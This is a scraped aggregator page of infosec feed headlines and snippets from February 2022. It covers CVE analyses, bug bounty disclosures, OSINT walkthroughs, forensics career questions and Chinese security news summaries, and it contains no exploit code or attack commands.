• Open

    Inventing Anna, engenharia social e OSINT, qual o prospecto para o futuro no quesito de segurança…
    O quanto de informação pessoal e íntima divulgamos nas mídias sociais de forma espontânea e despreocupada? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in a life looks like as a infosec analyst. also what would company’s look for when hiring a junior infosec analyst
    what would a company look for when hiring junior infosec analysts? i just started as a junior help desk technician and i hear that experience is better than certs i just want to get an idea of what a company will look for when hiring a junior infosec analyst also is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist, Watched a few videos but didn't got a thing, it feels like I'm missing some knowledge gaps in between, Can someone please give me a clear roadmap so that I can start using Radare2? ​ Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." im in too deep this forensic thingy is kinda exciting and im in a business major. I guess one can really recover deleted telegram chats using cellebrite! amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data are included in apple icloud productions ? do they include permanently deleted files notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    hello friends to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit. but its very essential to deal with people there. so decided to jump to forensics, do you people deal with humans or simply have to worry about machines and that is it? and, i am cisa certified, will that help? what certification do you suggest taking for computer forensics? and how is the pay for IT Audit vs Computer forensics? in short, do you recommend the shift or not? thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys what can be the reason to not have a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    Le guide ultime pour améliorer ses recherches concurrentielles sur Google
    Vous souhaitez améliorer vos requêtes lors d’une recherche sur votre concurrent ou sur votre marché ? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why SOC 2 report are made by CPA ? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountant? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is medium rated box, but great for any new Red Team Member or penetration… Continue reading on Medium »  ( 2 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    Bir web uygulamasında kullanılan veriler dış bir kaynak aracılığıyla alınıyorsa ve saldırgan web sunucusunun göndermiş olduğu istek… Continue reading on Medium »  ( 7 min )
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
  • Open

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
  • Open

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0  ( 21 min )

  • Open

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm [link] [comments]  ( 1 min )
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful [link] [comments]
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n [link] [comments]
  • Open

    What is it like to work a computer forensics job?
    How is working for a computer forensics job like? Is it easy as simple as just plugging a hard drive or phone or anything that needs data recovery to retrieve data back or is it much harder and more work? Just wondering because i am a computer science major currently a freshman I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852 [link] [comments]  ( 2 min )
    Where do deleted browser history go to?
    I know when u delete something, it never really gets deleted. So just curious, where does cleared browsing history for chrome/safari go to? and are we able to retrieve it? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    How do you really get into incident response
    I have recently graduated from college with a Bachelors in df but the school I went to really was more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc is much appreciated! submitted by /u/JunketThat2134 [link] [comments]  ( 5 min )
  • Open

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Dev Genius »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Medium »
  • Open

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439 [link] [comments]
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia [link] [comments]  ( 1 min )
    Best way to limit results by language?
    Greetings! I am currently new to the ussage of open directories and have been wondering how to limit my results for a movie for example to only my language. I am useing the "all resourves i know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy [link] [comments]  ( 1 min )
  • Open

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1  ( 4 min )
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0  ( 10 min )
  • Open

    Hacking the marketplace
    Guys! This room it’s great and I had a lot of fun, with this room you can learn this: Continue reading on System Weakness »  ( 2 min )
    Recon and YouTube, is that a thing?
    Hey fella hunters, hope you all are doing fine. This is my first ever blog, I will try to keep it as much simple as possible spilling as… Continue reading on Medium »  ( 4 min )
    How i was able To hack Cambridge University ( Arabic )
    السلام عليكم معاكم اخوكم ناصر , بسبب دعمكم السابق لي قررت اكتب هذي المقالة Continue reading on Medium »  ( 1 min )
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 2 min )
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 5 min )
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »  ( 2 min )
    Вынікі аўдыта бяспекі Firefly
    Арыгінал:https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »  ( 2 min )
    I’ve made over $588k on Bug Bounty so far
    How much one can earn on Bug Bounty? Continue reading on Medium »  ( 1 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 2 min )
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »  ( 1 min )
  • Open

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000
  • Open

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and are about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk [link] [comments]  ( 2 min )
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependant on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for a an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I recieve a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835 [link] [comments]
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this however this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 1 min )
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »  ( 2 min )
    OSINT: How extract text From an Image or Video
    Did every wonder what a piece of foreign text means on a sign, banner, or in a video. Sure you can type it into google translate or speak… Continue reading on Medium »  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    FreeBuf早报 | Meta因隐私案赔付九千万美元;谷歌推新隐私保护政策
    Facebook 母公司 Meta 同意支付 9000 万美元,以了结一场十年前的诉讼案件。  ( 1 min )
    一种基于Golang的僵尸网络正在成为新的威胁
    近日,网络安全研究人员破解了一种名为Kraken的新型僵尸网络。该僵尸网络是基于Golang语言开发的,黑客们正在积极对它进行优化升级。
    谷歌宣布将在安卓系统内引入“隐私沙盒”
    谷歌周三宣布,计划将隐私沙盒引入安卓系统,以期将既注重隐私、又不会对用户造成干扰的广告技术扩展到移动网络。
    勒索软件猖獗,2021 年检测到 6.23 亿次
    物联网恶意软件、加密威胁和加密劫持等都保持了全年的高速增长。  ( 1 min )
    FreeBuf周报 | 国际互联网协会数据泄露;乌克兰遭大规模DDoS攻击
    乌克兰国家安全机构(SSU)宣称,此次针对乌克兰的网络攻击,是有预谋,有组织、背后有庞大“黑手”的具体行动。  ( 1 min )
    黑客潜入Microsoft Teams发送恶意软件
    黑客利用Microsoft Teams,并在聊天里传播恶意可执行文件。
    FreeBuf甲方群话题讨论 | 聊聊企业安全运营中的个人数据隐私
    作为企业的安全部门,确保企业安全稳定运作的同时,如何保护平台数据时代下每个“透明人”的隐私数据安全?
    巨头让步!Meta 将支付 9000 万美元
    案件指控 meta 使用 cookies 追踪已退出账号的 Facebook 用户。  ( 1 min )
    你的跳蛋,黑客们表示很感兴趣
    跳蛋、按摩棒是你深夜的好伙伴,它们可能也在偷偷泄露着你的使用数据。  ( 1 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
  • Open

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0  ( 6 min )

  • Open

    Would you support brain forensics (mind reading)
    Poll View Poll submitted by /u/themariocrafter [link] [comments]  ( 1 min )
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi Just wondering if any enterprise size companies are running sysmon on workstation and/or servers and forwarding the event to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering API's that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland [link] [comments]  ( 3 min )
  • Open

    How to track vehicles using Open Souce Imagery
    Vehicle information can be fantastic tool for investigators to scrutinize and track a real world target, but what OSINT opportunities can… Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 3 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my twitter push me a tweet, lets see what does the tweet write: Continue reading on Medium »  ( 2 min )
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »  ( 2 min )
  • Open

    Why should you not send sensitive data over email
    Currently the company I work for sends sensitive documents over email.They Password protect them but then send the password also using email format. submitted by /u/Linux98 [link] [comments]  ( 3 min )
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I in the process of trying to buy an apartment together. Mom will put it under my name. This is first time im doing this and she told me i needed to email my SSN to the loan officer. I have protonmail which is secure mail and is encrypted email. Would it be safe to send my SSN over email to the loan officer in this case since she would need it to open my credit report. I do not know if the officer loan email is encrypted or not Or should i give her my SSN in another way such as telling her on the phone call to be on the safe side? or would be email be just fine? submitted by /u/Wastedmess [link] [comments]  ( 3 min )
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator. " I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally are there any respected research authority on these type of questions in IT-sec? Thanks! submitted by /u/someuserman [link] [comments]  ( 3 min )
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturers box and even has the carriers sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE [link] [comments]  ( 3 min )
  • Open

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »  ( 5 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6  ( 4 min )
  • Open

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »  ( 5 min )
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup on how i bypass 403 & accessed the config file Continue reading on Medium »  ( 1 min )
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »  ( 3 min )
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student was awarded $100,500 (around 75 lakhs) as a bounty, after he showed Apple how a vulnerability… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »  ( 2 min )
  • Open

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula [link] [comments]  ( 1 min )
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985 [link] [comments]
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369 [link] [comments]
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
  • Open

    SecWiki News 2022-02-17 Review
    WordPress 生态中恶意插件的大规模研究 by Avenger 2021年工业控制网络安全态势白皮书 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    美国称俄罗斯国家黑客破坏了国防承包商
    据报道,俄罗斯黑客组织发动对美国CDCs的持续性攻击。  ( 1 min )
    小心了,即将推出的Chrome、Firefox100可能存在严重风险
    即将推出的 Firefox 100和 Chrome 100版本浏览器存在严重风险,在解析包含三位数版本号的用户代理字符串时可能会破坏网站。  ( 1 min )
    schoolcms 代码审计
    最近一直在研究thinkphp的框架,今天找了一个cms进⾏审计,发现了两处注入点,由此来进行分析一下。  ( 1 min )
    机器学习会成为数据安全新威胁和后门吗?
    研究机器学习和人工智能系统安全的专家警告称,未来这类系统可能被专业的攻击者所利用。  ( 1 min )
    FreeBuf早报 | 美国称俄罗斯黑客入侵多个国防部承包商;Trickbot针对60家名企客户
    红十字国际委员会(ICRC)最近遭到网络攻击,超过51.5万名“高危人群”的数据被泄露,这很可能是国家支持的黑客所为。  ( 1 min )
    打满马赛克就安全?新技术已能够从像素化图像中还原文本信息
    本周,安全公司Bishop Fox 的首席研究员从像素化的文本图像中清楚地恢复了其中的字母信息。  ( 1 min )
    2022 年值得关注的 10 家最热门 XDR 安全公司
    注:本文转自SDNLAB,仅供查阅 据研究机构 Forrester 称,扩展检测和响应 (XDR) 市场目前还处于早期阶段,现有的  ( 1 min )

  • Open

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345
  • Open

    Company refuses to provided any training for our SOC
    Since joining multiple analysts have requested some type of training whether it’s vendor specific for tools like the SIEM or vendor neutral training such as SANS but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    what are some affordable and credible penetration testing certifications?
